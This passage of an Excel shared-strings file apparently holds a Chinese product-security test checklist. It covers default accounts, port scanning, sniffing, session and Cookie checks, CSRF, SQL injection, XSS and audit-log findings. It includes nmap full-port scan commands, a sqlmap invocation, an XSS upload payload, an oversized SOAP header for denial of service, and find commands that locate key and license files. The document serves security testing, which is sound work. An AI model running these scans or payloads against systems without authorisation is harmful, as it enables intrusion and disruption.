2、结合开发人员的访谈，检查系统是否存在可绕过系统安全机制（认证、权限控制、日志记录）对系统或数据进行访问的功能，例如：固定密码、隐藏帐户、隐藏命令、隐藏参数、隐藏软参，隐藏接口、调试端口/命令等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查系统是否存在以下用户，如果存在是否公开并且提供密码修改指南：
所有操作系统所有用户(OS的+产品安装运行用户):cat /etc/passwd
管理端缺省登录用户（包含Web控制台）
接口认证缺省登录用户
数据库缺省用户：包含应用的DB用户+数据库自带缺省用户(ORACLE：select * from all_users)
内置ftp用户、模块间连接用的用户等(一般在配置文件中)
VCS、F5、Radaware等集群管理软件的用户
第三方开源软件的用户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查设计文档，如果使用以下传输协议，则检查其版本是否符合要求，符合要求的协议版本为： SNMPv3、SSH V2、TLS1.1 及以上版本。
或者使用下面测试方法：
1.检查snmp：登录服务器，使用chkconfig命令，检查snmp是否开启；如果系统开启snmp服务，则找到/etc/snmp/snmpd.conf配置文件
AIX：lssrc -a查看服务，配置文件在/etc/snmpd.conf
其他OS根据实际情况测试
2.检查SSH版本：/etc/ssh/sshd_config-------查看protocol参数，或者通过NMAP扫描查看SSH版本。
3、检查SSL版本：登陆被测服务器，使用如下命令在本测服务器或者Windows之CMD命令行上执行openssl s_client -connect IP:port(此处请使用大家配了ssl的服务器IP)
测试方法二：
1、通过nmap扫描被测系统：
nmap -T4 -A -v IP
IP修改为真实被测系统IP地址。
检查扫描结果SSH端口protocol的值是否为1.99
2、在客户端访问被测系统的https页面，右键打开属性页面，查看“连接”里面的值是否为TLS1.1
注：支持多操作系统的都要测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查产品对外发布资料中是否配套提供产品通信矩阵；
2、检查通信矩阵的内容，是否有描述机器/网元/模块间的通信关系，包括：通信使用的端口、协议、IP地址、认证方式、端口用途信息等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1、在未搭建的环境上，独立部署管理功能部件，检查管理功能是否可以正常启动使用；
2、卸载管理功能部件，独立部署业务功能部件，检查业务功能是否可以正常启动使用
方法二：
1、已经搭建完毕的环境上，卸载管理功能部件，检查业务功能是否不会受到影响，是否可以正常使用
2、将卸载的管理功能部件重新部署，卸载业务功能部件，检查管理功能是否不会受到影响，是否可以正常使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1、登录被测主机
2、通过如下命令扫描端口
tcp端口扫描：
netstat -an|grep tcp(WINDOWS使用 netstat -an|findstr "TCP")
udp端口扫描:
netstat -an|grep udp(WINDOWS使用 netstat -an|findstr "UDP")
将此扫描结果与通信端口矩阵文档进行对比
方法二：
1、通过Nmap对各服务器进行端口扫描：
tcp端口扫描：
Nmap -P0 -sS -n -p 1-65535 -oX tcp.xml -sV 10.71.99.12
udp端口扫描:
Nmap -P0 -sU -n -p 1-65535 -oX udp.xml -sV 
10.71.99.12(suse的udp端口扫描非常耗时)
服务扫描（此步骤大T局点交付的可选）：
Nmap -P0 -sO -oX service.xml 10.71.99.12
备注：1.测试时IP地址必须改为被测设备的实际IP地址。
2.Linux环境下使用nmap扫描UDP端口时间过长，可以通过如下操作解决：
echo "0" &gt; /proc/sys/net/ipv4/icmp_ratemask</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查产品设计文档或资料，梳理产品所有涉及非信任网络的B/S、C/S应用、接口(ftp/webservice等)，检查是否涉及敏感数据的传输
2.运行相应的功能并使用嗅探工具进行嗅探
3.查看嗅探记录，根据传输的源IP及目的IP过滤出相应的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的敏感数据。
4.如果嗅探记录中为密文敏感数据，是否存在：密文与密钥一起传输、传输口令的MD5摘要(数据库中存储的也是MD5摘要)等不和规的场景</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.梳理产品特性是否涉及的敏感数据（典型的敏感数据包括：口令、银行帐号、大批量个人数据、用户通信内容、密钥、用于认证的证书、License、用于网络通信协议协商的身份认证Key等）
2.检查敏感数据在系统部(物理/内存数据库、配置文件、话单、dedug日志、脚本、Web页面、客户端等等)是否加密存储
注：oracle数据库使用“SELECT * FROM USER_TAB_COLUMNS where column_name LIKE '%BANK%' ORDER BY TABLE_NAME”，搜索相关字段（红色字体可替换ACCT_NO等其他常用关键字）
find . -name "*crt*"
find . -name "*der*"
find . -name "*cer*"  
find . -name "*key*"
find . -name "*lic*"
find . -name "*.dat"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查设计文档/发布资料或者访谈或者遍历web管理、接口、工具等操作，梳理产品正常业务中必需的个人数据采集、处理功能：比如开户时输入姓名、身份证、手机号等信息
2.检查这些个人数据采集和处理模块是否有安全保护机制：
   （1）调用这些功能是否需要先通过认证：web管理和接口通过认证，脚本工具通过权限控制，其他场景根据实际情况分析
   （2）是否有日志记录这些功能的调用处理过程；
   （3）web管理和接口：不具备调用权限的普通用户是否能非法调用这些功能；脚本工具至少-非同组用户不可读写和执行
3.检查个人数据存储是否有安全保护机制：
   （1）物理/内存数据库：用户认证授权
   （2）文件（比如话单、导出客户信息的文件、照片等）：权限控制根据业务需求，如果同组用户必须读取也可以容许，至少保证其他用户无法读取；
   （3）其他形式：根据产品实际情况分析保护机制
4.检查个人数据需要导出客户网络时有匿名化机制
4.1如果这些数据涉及华为人员，请参考用例“华为人员参与对现网设备中个人数据进一步整理与分析的场景”
5、检查这些功能在产品资料中是否向运营商公开
注：个人数据定义请参考"说明"中的术语解释，根据产品涉及的场景进行以上三点分别测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、根据对系统所有接口得了解，分析那些接口涉及敏感数据密文传输（或者结合红线条目“口令加密存储”“禁止私有算法”用例一起测试：检查产品数据库、配置文件、内存、脚本等中所有加密场景（口令加密、文件加密等）梳理该场景是：仅用于本地加密还是用于敏感数据加密传输。），检查用于敏感数据加密传输的算法之密钥是否可配置
2.使用shell脚本和工具检查代码中密钥敏感字符串（key、sharekey、encrypt、enc、dec、decrypt等）。
并结合开发人员人工访谈&amp;分析，并且确认初始密钥是否使用工具生成。
3、代码走读。
具体测试方法可以参考文档《未公开接口测试方法指导》</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.如果默认支持不安全协议产品文档中应该提示风险；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、用户输入数据不合法
2、服务器产生的输入数据不合法
3、是否依赖于客户端校验
4、对于在客户端已经做了输入校验，在服务器端再次以相同的规则进行校验时，一旦数据不合法，会话是否失效
5、如果输入只允许包含某些特定的字符或字符的组合，是否使用白名单进行输入校验。
6、是否校验输入数据的长度。
7、是否校验输入数据的范围。
8、用于处理数据库数据的相关操作，输入参数直接是引号空格等号等</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用了公司推荐的安全随机函数来生成会话标识的，则认为是安全的；
2、使用了生成会话的安全配置的，则认为是安全的；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、认证后正常登录被测系统；
2、访问显示敏感数据的界面/接口（有权限访问的）；
3、检查是否能正常访问；
4、访问显示敏感数据的界面/接口（没有权限访问的）；
5、检查是否能正常访问。
注：界面可通过WebScarab/burpsuite_v1.4.01.jar进行Web应用越权测试，其他接口参考产品自己的工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查系统是中正常业务流程以及出于维护、定位目的的采集并存储个人数据、导出个人数据的场景：是否涉及华为人员参与对现网设备中个人数据进一步整理与分析的场景
举例：华为人员测试版本时需要使用现网的数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查密钥的使用是否符合以下要求：
1、同一笔业务中，若既需要加密运算也需要计算MAC，则加密操作和计算MAC操作不允许使用同一个对称密钥
2、同一笔业务中，若既需要使用非对称加密又需要进行数字签名，则加密使用的公钥和签名使用的私钥不允许来自同一个密钥对或同一个数字证书</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 Web Service运行正常
2、 已知某接口WSDL地址http://PortalIP:Port/Path/Interface?wsdl
3、 已知每个接口方法返回结果的含义</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 运行WSDigger；
2、 点击右下角的Next按钮进入WSDL页面；
3、 在WSDL输入框中输入接口的WSDL地址http://PortalIP:Port/Path/Interface?wsdl；
4、 点击Get Methods按钮，获取接口方法；
5、 在左侧的接口方法树形框中选择要测试的方法；
6、 选择菜单Attacks-&gt;Select Attack Type，弹出攻击类型对话框，在对话框左侧的选择列表框中选择所有的测试项；
7、 点击Start；
8、 观察返回的结果，根据WSDL接口定义的返回事件判断是否成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 登陆Web服务器的操作系统；
2、 用find命令查找是否存在HappyAxis.jsp页面：find ./ -name "?appy?xis.jsp"；
3、 利用查询到的目录信息构造访问HappyAxis.jsp页面的URL，通过Web方式访问该页，例如：http://www.exmaple.com/axis2/happyaxis.jsp；
4、 如果能访问到happyzxis.jsp则存在漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、进入sqlmap安装目录。
2、执行命令：sqlmap.py -u http://www.exmaple.com/page.xxx?name=value。
3、观察结果，查看是否存在注入漏洞。
备注：通过appscan扫描可以扫出部分sql注入漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看外部接口IP和内部接口IP是否处于同一网段。
2、如果处于同一网段，尝试从可以连通外部接口的测试机ping系统内部接口，看是否可以ping通。
3、如果不在同一网段，尝试在测试机或中间路由器上配置路由，目的地址为系统内部接口IP网段，之后尝试ping系统内部接口，看是否可以ping通。
备注：如果系统做了加固，禁止ping探测，则尝试使用nmap强制扫描替换ping探测。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：MDS 6600网络版（C/S架构）中，服务端对客户端用户的管理操作行为记录不全面：1. 日志内容缺失记录事件的操作者ID；2. 用户登录系统、退出系统、强制其他在线用户下线、修改所属组等管理操作无日志记录。
问题2（致命）：系统通过第三方组件openssh实现作为SFTP服务端，通过SFTP客户端连接服务端进行文件上传、下载等操作后，没有相应的日志记录。
问题3（致命）：WI/HDC/GaussDB/License/vAG/vLB组件的SFTP无日志记录：通过Gandalf账户注销，下载、上传、删除文件均无日志。
问题4（致命）：系统通过第三方组件openssh实现SFTP服务端功能，用于和网元以及上层OSS之间进行性能文本数据的安全传输。通过SFTP客户端连接服务端进行文件上传、下载、删除等操作后，系统及组件都没有相应的文件上传、下载、删除操作的日志记录。网管的FTP目录下不但会存放性能采集的数据文件，还会存放网管备份文件等重要数据。如果没有FTP相关文件操作的日志记录，可能导致系统无法进行问题追溯，网管的审计功能受到严重影响，且在出现问题时不易撇清与华为不相关的责任。
问题5（致命）：NMAP扫描被禁用 通过BP开启nmap没有记录系统日志Nmap扫描功能已经被开启。
问题6（致命）：只要是配置都要有日志。虽然只能配置成与MC上的FTP相同，但配置了，相当于打开了FTP的开关。还是对系统的功能作了改变的。
问题7（致命）：1）修改网关ACS远程管理服务器地址，查看日志记录。2）修改网关访问控制规则，查看日志记录。测试结果：上述操作均不记录日志。建议：1）修改网关ACS远程管理服务器地址记录日志。2）修改网关访问控制规则增加日志记录。
问题8（致命）：通过OpenAPI创建用户没有记日志。
问题9（致命）：1）问题的相关代码（反编译代码可能存在误差）。操作75678004最终调用脚本“stop_sysportal.sh“ ，关闭tomcat；2）实际操作，使用仅具备watcher权限的用户登陆，发送pwdMgr.do”请求，并将“method”设置为“rebootWebServer，送之后tomcat重启，web连接失败。数分钟后重新登陆，系统日志中未记录重启动。 在linux下搜索，也并未找到含有代码中所写的”reboot web server“的日志。
问题10（严重）：Chrome浏览器登录WebLMT，锁定后删除页面源码3个图层（lockmaskdialog/lockmaskdialog___iframe及src=blank.html），即可绕过锁定机制，执行MML命令，产品规避方案采用在webserver处针对性识别8条敏感MML命令（ADD OP/MOD OP/RMV OP/SET OPLOCK/SET OPSW/SET PWDPOLICY/ULK USR/SET WEBLOGINPOLICY）并限制执行，敏感命令没有发送到网元，因此网元没有记录命令执行的日志，不满足安全的可追溯性要求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（一般）：SM系统除了自有的管理员可以管理系统，也可以用MC的管理员通过链接方式来管理。但通过MC的管理员的远程操作，日志操作者全部显示成RemoteAdmin，无法区分是哪个MC管理员操作的。
问题2（一般）：日志记录管理操作结果缺失。
问题3（一般）：日志内容要能支撑事后的审计及复原，应详细记录用户的活动。目前产品通过web统一入口接入后可分别进行6个维护操作能功能，对用户登入登出的相关页面的日志不能识别到具体的操作功能，不能有效地支撑事后复原审计，因此建议在日志中能识别出用户实际登入登出的操作页面。
问题4（一般）：查看FC的操作日志，操作用户全部是localhost，不能确定是哪个用户进行的操作，无法追溯。
问题5（提示）：通过Spider工具访问LMT接口，操作日志记录的工作站IP为255.255.255.255，无法追踪具体操作机器。
问题6（提示）：日志内容要能支撑事后的审计及复原，应详细记录用户的活动。目前产品通过web统一入口接入后可分别进行6个维护操作能功能，对用户登入登出的相关页面的日志不能识别到具体的操作功能，不能有效地支撑事后复原审计，因此建议在日志中能识别出用户实际登入登出的操作页面。
问题7（提示）： 1）ftp登录成功日志记录错误，看不出ftp登录成功的日志记录；2）ssh登录成功日志记录建议增加登陆用户类型信息；3）WEB日志信息中，默认配置下超级管理员登录注销，日志中只有账号的登出消息，缺少登录操作信息。
问题8（提示）：日志对用户主动注销和系统超时退出没有差异化记录，统计记录为用户退出系统。
问题9（提示）：升级过程中的上传软件到主机步骤没有连接成功FTP服务器之前，系统直接删除备份区文件且日志记录不清晰。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>084 DOS攻击锁定用户账户测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>146 Apache Struts2 includeParams属性远程命令执行漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动SOAPUI工具
2.新建工程，导入WSDL文件
3.左侧将列出接口方法，点击需要测试的接口
4.编辑请求消息，构造大量的负荷发送到服务器端，如在消息头中插入大量字符串
5.点击发送请求按钮，查看系统是否异常
例如：
&lt;Envelope&gt;
&lt;Header&gt;
&lt;wsse:Security&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt;
&lt;Hehehe&gt;I am a Large String (1MB)&lt;/Hehehe&gt; …
&lt;Signature&gt; … &lt;/Signature&gt;
&lt;/wsse:Security&gt;
&lt;/Header&gt;
&lt;Body&gt;
&lt;BuyCopy&gt;&lt;ISBN&gt;0098666891726&lt;/ISBN&gt;&lt;/BuyCopy&gt;
&lt;/Body&gt;&lt;/Envelope&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访谈：
1.根据产品提供的接口说明文档，通过调用和人工访谈的方式获取接口的认证方式
2.检查模块间通信以及产品对外通信接口是否有接入认证机制：
测试方法：访谈orSE确认or产品实际功能测试工具测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品的默认设置是否对隐私进行保护，不需要用户去做一些额外操作才能达到保护隐私的目的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据《用户清单》《密码修改指南》检查是否存在无法修改口令的用户
2.检查人机接口以及可远程访问的机机接口是否存在硬编码账号与口令：
方法一：访谈
方法二：查看接口资料
方法三：通过Search and Replace扫描关键字，详情见《未公开接口测试方法指导》</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、结合开发人员人工访谈
2、资料审查，确定是否有未文档化的命令/参数、端口等接入方式（包括但不限于产品的生产、调试、维护用途）
说明：受限公开是指依据与运营商的协议或所在国家法律法规要求而提供。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、梳理通信矩阵文档中：所有平面中涉及的可以对系统或系统数据进行管理（增删改）的端口
2、剔除协议标准定义中无认证机制的端口
3.检查管理端口是否有接入认证机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问显示敏感数据的页面；检查用户未进行过身份认证，是否会弹出认证界面
2.访问显示敏感数据的接口；检查用户未进行过身份认证，是否访问失败。
3.访问显示敏感数据的文件(配置文件、脚本、日志等等)等，没有认证是否会失败
4.根据产品特性排查其他访问敏感数据的形式，检查检查用户未进行过身份认证，是否访问失败</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问用户的个人数据要有认证机制
2.存储用户的个人数据要有读写权限控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于基于现网设备中的个人数据进行进一步整理、分析，且有华为人员参与数据处理的增值服务场景，允许采集、处理系统中的个人数据，但必须遵循如下要求：
1）对个人数据采集或处理的相关操作，必须提供安全保护机制（如认证、权限控制、日志记录等），防止个人数据被泄漏。
2）对于所涉及的个人数据，应支持在呈现界面上（如显示界面、文件存储/导出等）进行过滤或匿名化。
3）相关操作必须得到客户的授权，禁止进行超出客户审批范围的任何操作，在完成服务后，必须在客户的监督下对所涉及的个人数据进行安全删除，针对敏感市场未经客</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.没有使用不安全的加密算法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密钥是可配置的并用工具生成的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不可通过下载路径得到系统敏感数据文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、必须对所有用户产生的输入进行校验，一旦数据不合法，应该告知用户输入非法并且建议用户纠正输入。
说明：用户产生的输入是指来自 text、password 或 textareas 表单域的数据；必须假定所有用户产生的输入都是不可信的，并对它们进行合法性校验。
2、必须对所有服务器产生的输入进行校验，一旦数据不合法，必须使会话失效，并记录告警日志。
说明：服务器产生的输入是指除用户产生的输入以外的输入，例如来自 hidden fields、selection boxes、check boxes、radio buttons、cookies、HTTP headers、热点链接包含的 URL参数的数据或客户端脚本等；必须假定所有服务器产生的输入都是被篡改过的、恶意的，并对它们进行合法性校验，如果不合法，说明有人恶意篡改数据。举例：假如用户资料填写表单中的“性别”为必填项，用 radio button（‘男’和‘女’对应实际值分别为‘1’和‘0’）来限制用户的输入，如果应用程序收到的“性别”值为‘2’，那么可以断定有人恶意篡改数据。
3、不能依赖于客户端校验，必须使用服务端代码对输入数据进行最终校验。
说明：客户端的校验只能作为辅助手段，减少客户端和服务端的信息交互次数。
4、对于在客户端已经做了输入校验，在服务器端再次以相同的规则进行校验时，一旦数据不合法，必须使会话失效，并记录告警日志。
说明：肯定存在攻击行为，攻击者绕过了客户端的输入校验，因此必须使会话失效，并记入告警日志。
5、如果输入只允许包含某些特定的字符或字符的组合，则使用白名单进行输入校验。
说明：对于一些有规则可循的输入，如 email 地址、日期、小数等，使用正则表达式进行白名单校验，这样比使用黑名单进行校验更有效。
6、校验输入数据的长度。
说明：如果输入数据是字符串，必须校验字符串的长度是否符合要求，长度校验会加大攻击者实施攻击的难度。
7、校验输入数据的范围。
说明：如果输入数据是数值，必须校验数值的范围是否正确，如年龄应该为 0～150 之间的正整数。
8、用于处理数据库数据的相关操作，输入参数不能直接将引号空格等号等直接传输给数据库，以防止SQL注入攻击。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.注册一个用户帐号，并使用我司服务
2.用该账户停止我司服务，并注销后退出系统
3.使用我司管理员ID查看该注销用户信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注销的用户信息已销毁</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过https://172.2.0.4:8834/flash.html进入实验室nessus扫描环境。输入用户名、密码登陆系统
2.点击“Policies”（策略），添加或导入一个新策略。(已有可用的策略，可忽略此步)。
3.对于新添加的策略，合理配置策略内容。(已有可用的策略，可忽略此步)（注：关于策略设置，可参考能力地图中的《Nessus工具使用指导书 》）
4.点击“Scans”（扫描），点击“add”新增一个扫描，选择已有的策略，录入目标系统的地址，点击右下角的“Launch Scan”按钮，开始扫描
5.扫描结束后，导出或查看报告。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.经过分析，剔除误报内容，扫描报告中不存在因为注释而导致的信息泄露的漏洞。
2.手工测试不存在因为注释而导致的信息泄露的漏洞(比如：内网IP地址、SQL语句、密码、物理路径等)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全事件及重要的操作日志有相应的日志记录，日志至少包含：事件发生的时间、客户端IP、成功或失败标识、事件的详细描述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器；
2.进入Web部署目录，用find命令，查找是否存在以下备份文件，如果存在则测试不通过
find ./ -name "*.bak"
find ./ -name "*.BAK"
find ./ -name "*.old"
find ./ -name "*.OLD"
find ./ -name "*.zip"
find ./ -name "*.ZIP"
find ./ -name "*.gz "
find ./ -name "*.rar"
find ./ -name "*.tar"
find ./ -name "*.temp"
find ./ -name "*.save"
find ./ -name "*.backup"
find ./ -name "*.orig"
find ./ -name "*.000"
find ./ -name "*.dwt"
find ./ -name "*.tpl"
find ./ -name "*.swp"
备注：这些文件会泄漏源代码或者敏感信息,如果业务需要使用以上文件类型，文件名称必须使用安全的随机命名规则</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.及时更新补丁或升级系统，使用最新最稳定的安全版本。
2.隐藏或伪装Apache的版本及版本相关提示信息
3.限制http请求的消息主体的大小
4.定制apache出错信息息
5.……
备注：具体参考公司内部技术规范：《Apache安全配置规范_V1.2》或更高版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.及时更新补丁或升级系统，使用本系列最新最稳定的安全版本
2.删除安装过程文件、缺省安装的管理帮助文件及用户测试类的非必需文件
3.禁用应用程序自动部署功能
4.以安全管理模式运行Tomcat
5.……
备注：具体参考公司内部技术规范：《Tomcat安全配置规范 V1.6》或更高版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问操作员的登录/认证页面，查看是否存在验证码；
2.如果不存在，则用正确的帐号和错误的口令尝试登录多次（如果产品提供该功能，实际次数为准），查看系统是否强制必须提供验证码。
备注：客户端提交的参数，不具备关闭验证码的功能，不具备定义步骤2的错误尝试次数的功能。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1.点击“注销（或退出）”按钮或菜单；
2.使用Web代理工具拦截返回消息，检查是否清除Cookie或者重置Cookie等，使用Set-Cookie将过期时间设置为过去的时间。
方法二：
注销后，点击浏览器返回按钮是否可以再次浏览网页内容。浏览器缓存页面情况下使用方法一。
方法三：
1.登录系统；
2.在Web页面中进行一些操作（比如修改个人信息），并使用Web代理工具记录下来；
3.退出系统；
4.使用Web代理工具重新发送“步骤2”的URL请求；
5.观察返回结果，如果还能够正常完成“步骤2”的操作，则存在安全漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具，拦截客户端发送的请求信息，查看Cookie中是否包含明文数据，包括经过BASE64编码的明文,以及16进制编码，MD5的HASH值。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.打开本地永久Cookie文件，或通过Web代理工具拦截Cookie信息；
2.查看Cookie中存储的信息的加密算法或HASH算法。
注：可以与开发人员交流Cookie保存的方式，获取相关加密算法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具捕获响应消息，查看Set-Cookie响应头的Domain属性：如果Web应用存在于app.mysite.com 服务器上，那么它应该被设置成 ";
domain=app.mysite.com"而不能设置成"; domain=.mysite.com"，因为这种设置会允许其它存在漏洞的服务器接收到 Cookie 。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录系统；
2.使用Web代理工具捕获响应消息，查看Set-Cookie响应头的Path属性：
如果Web应用存在于"/myapp/"，确认Cookie路径设置是否为"; path=/myapp/"，而不是设置为"; path=/"或";path=/myapp"。
注意在"myapp"之后必须使用"/"。如果没有使用，浏览器将Cookie发送给任何匹配"myapp"的路径，如"myapp-exploited"。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1.登录系统，通过Web代理工具拦截登录请求，查看并记录其中的sessionid信息；
2.登录成功后，再访问任意功能菜单，并通过Web代理工具拦截登录请求，查看并记录其中的sessionid信息；
3.比较步骤1和步骤2获得的sessionid是否一致。（也就是登录前和登录后，会话标识是否一致）。
方法二：
利用Appscan对Web应用进行扫描，如果存在会话固定漏洞，扫描报告也会列出该漏洞。
注：方法二存在误报，部分产品的登录过程较为复杂，登录成功后数步才会进行会话的重新设置动作，该类产品请选择方法一。如果客户要求的是方法二，请使用方法一对该误报进行解释说明。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录系统，进行POST请求(表单提交)；
2.使用Web代理工具拦截请求信息，记录POST消息中的参数信息；
3.将POST消息转换为GET消息，即将参数信息放入URL中，发送给服务器端。如：
POST http://owaspapp.com/login.asp HTTP/1.1
Login=Username&amp;password=Password&amp;SessionID=12345678
转换为：
http://owaspapp.com/login.asp?Login=Username&amp;password=Password&amp;SessionID=12345678</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web系统，进行不同的业务请求；
2.查看浏览器地址栏中的URL是否携带了会话标识（如Sessionid，sid，JSESSIONID等形式）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访问一些重要操作，比如转账、添加用户等，按要求输入相应的数据，并提交；
2.通过Web代理工具拦截请求，查看整个交互过程中（有可能一个操作涉及多个步骤）客户端提交参数是否包含token、referer、动态口令以及验证码等信息。如果不存在任何验证信息，说明存在问题；
3.删除token、referer、动态口令以及验证码等信息并提交，如果请求成功，说明存在问题。
备注：
1.可以通过AppScan扫描来完成检测，当使用referer解决CSRF问题时存在一定的局限性，在特别重要的功能模块中不建议使用此方法；
2.不重要的功能模块中出现CSRF漏洞，经人为评估后不会造成严重影响，可以忽略此漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>跨目录下载文件不成功</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A用户无法查看B用户的信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不能越权获取到不该获取的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录服务器的操作系统，访问Web页面存放的目录（例如/home/tomcat/webapps，假设其web访问地址为：http://IP/webapps）；
2.查找该目录是否存在一些动态页面（如jsp），查询命令为：find ./ -name "*.jsp"
3.创建一个只有登录权限或只有登录/公共url权限的帐号，以该帐号登录Web系统；
4.根据查询到的文件列表，根据已知URL路径及结构尝试构造通过Web访问的URL来逐个访问这些文件（例如：http://IP/webapps/useradd.jsp或http://IP/webapps/manager/upload.jsp)；
5.如果能够访问到，分析该文件是否可被无操作权限的帐号访问。
注：包括但不限于.jsp、.html、.php、.xml、.txt、.conf、.htm、aspx等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.采用burpsuite扫描web系统（比如http://IP:PORT/frame.action/useradd.action?aaa=aaaa）
2.超级管理员/高级用户进行一系列的操作后退出
3.用只有登录权限的帐号登录Web系统
4.复制burpsuite抓取到的URL到浏览器/或者直接重发，观察服务器响应</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>存储式与反射式的确定过程类似。
1.向应用程序每个一可能的位置提交一个字符串，并检查应用程序的全部内容和功能，确定每个字符串在浏览器中显示的任何情况。因为应用程序可能对每个出现的字符实施不同的保护性过滤。
2.检查管理员能够访问的所有程序程序区域，确定其中是否存在任何可被其他非管理员控制的数据。
3.关注文件上传与下载的功能
如：上传时：POST /fileupload.aspx HTTP/1.1
[ … ]
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and
Settings\test\Desktop\test.txt"
Content-Type: text/plain
test
伪造的 HTTP POST 请求：
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and
Settings\test\Desktop\test.gif"
Content-Type: text/html
&lt;script&gt;alert(1)&lt;/script&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用正常功能上传脚本文件如*.jsp，如果提示不允许上传jsp文件，继续以下测试；
